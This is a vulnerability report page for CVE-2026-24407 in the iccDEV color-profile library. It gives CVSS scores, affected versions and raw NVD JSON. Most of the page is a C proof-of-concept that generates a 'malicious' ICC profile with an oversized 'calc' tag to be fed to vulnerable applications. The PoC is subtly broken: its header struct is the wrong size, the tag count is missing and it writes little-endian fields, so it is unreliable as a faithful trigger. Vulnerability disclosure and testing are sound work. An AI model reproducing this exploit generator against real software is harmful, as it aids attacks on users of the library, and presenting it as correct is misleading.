Security Vulnerability Report
CVE-2026-24407 CVSS 7.1 HIGH

CVE-2026-24407

Published: 2026-01-24 01:15:51
Last Modified: 2026-01-30 18:24:44

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have undefined behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to cause DoS, manipulate data, bypass application logic, and execute code. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-24407 PoC - Malicious ICC Profile to Trigger icSigCalcOp() Undefined Behavior
 *
 * This PoC demonstrates the creation of a malformed ICC profile that can trigger
 * undefined behavior in icSigCalcOp() function of iccDEV library <= 2.3.1.1
 *
 * Usage: Compile and run this program to generate a malicious ICC profile,
 * then have a vulnerable application process this profile.
 *
 * Note: This is for educational and security testing purposes only.
 * Author: Security Research
 * Reference: https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)
typedef struct {
    uint32_t size;               // Profile size in bytes
    uint32_t cmm_id;             // CMM signature
    uint32_t version;            // Profile version
    uint32_t device_class;       // Device class profile type
    uint32_t color_space;        // Color space of data
    uint32_t pcs;                // PCS (Profile Connection Space)
    uint16_t creation_date[12];  // Creation date/time
    uint32_t signature;          // Profile file signature ('acsp')
    uint32_t platform;           // Primary platform
    uint32_t flags;              // Profile flags
    uint32_t manufacturer;       // Device manufacturer
    uint32_t model;              // Device model
    uint64_t attributes;         // Device attributes
    uint32_t rendering_intent;   // Rendering intent
    uint32_t pcs_illuminant[3];  // PCS illuminant (X, Y, Z)
    uint32_t creator;            // Profile creator
    uint32_t profile_id[4];      // Profile ID (MD5 checksum)
} ICC_Profile_Header;

typedef struct {
    uint32_t tag_signature;      // Tag signature
    uint32_t offset;             // Offset to tag data
    uint32_t size;               // Size of tag data
} ICC_Tag_Table_Entry;
#pragma pack(pop)

#define ICC_PROFILE_SIGNATURE 0x61637370 // 'acsp'
#define PROFILE_VERSION_2_4   0x02400000

void create_malicious_icc_profile(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("[-] Failed to create output file\n");
        return;
    }

    printf("[*] Generating malicious ICC profile for CVE-2026-24407\n");

    // Create header with potentially malicious values
    ICC_Profile_Header header = {0};
    header.size = 128 + 12 + 4;            // Header + tag table + padding
    header.cmm_id = 0x4D49454E;            // 'MIEN'
    header.version = PROFILE_VERSION_2_4;  // Version 2.4
    header.device_class = 0x73636E72;      // 'scnr' (input device)
    header.color_space = 0x52474220;       // 'RGB '
    header.pcs = 0x58595A20;               // 'XYZ '
    header.signature = ICC_PROFILE_SIGNATURE;
    header.platform = 0x4150504C;          // 'APPL'
    header.rendering_intent = 0;
    header.pcs_illuminant[0] = 0x0000F6D6; // 0.9642
    header.pcs_illuminant[1] = 0x00010000; // 1.0000
    header.pcs_illuminant[2] = 0x0000D32D; // 0.8249
    header.creator = 0x67697468;           // 'gith'

    // Write malicious header
    fwrite(&header, sizeof(ICC_Profile_Header), 1, fp);

    // Create malicious tag table entry
    // This triggers undefined behavior in icSigCalcOp()
    ICC_Tag_Table_Entry tag = {0};
    tag.tag_signature = 0x63616C63;        // 'calc' - triggers icSigCalcOp()
    tag.offset = 128;                      // Offset to tag data
    tag.size = 0xFFFFFFFF;                 // Malicious size value
    fwrite(&tag, sizeof(ICC_Tag_Table_Entry), 1, fp);

    // Write malicious tag data that triggers undefined behavior
    uint8_t malicious_data[4] = {0xFF, 0xFF, 0xFF, 0xFF};
    fwrite(malicious_data, sizeof(malicious_data), 1, fp);

    fclose(fp);

    printf("[+] Malicious ICC profile saved to: %s\n", filename);
    printf("[*] This profile can trigger undefined behavior in icSigCalcOp()\n");
}

int main(int argc, char* argv[]) {
    const char* output_file = "malicious_profile.icc";
    if (argc > 1) {
        output_file = argv[1];
    }

    printf("========================================\n");
    printf("CVE-2026-24407 PoC Generator\n");
    printf("iccDEV icSigCalcOp() Undefined Behavior\n");
    printf("========================================\n\n");

    create_malicious_icc_profile(output_file);

    printf("\n[!] Disclaimer: This tool is for authorized security testing only.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24407", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:51.223", "lastModified": "2026-01-30T18:24:44.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 y anteriores tienen Comportamiento Indefinido en icSigCalcOp(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la Ejecución de Código. Este problema ha sido solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/881802931a71c4b0dfc28bc80ee55b2cb84dab90", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/481", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}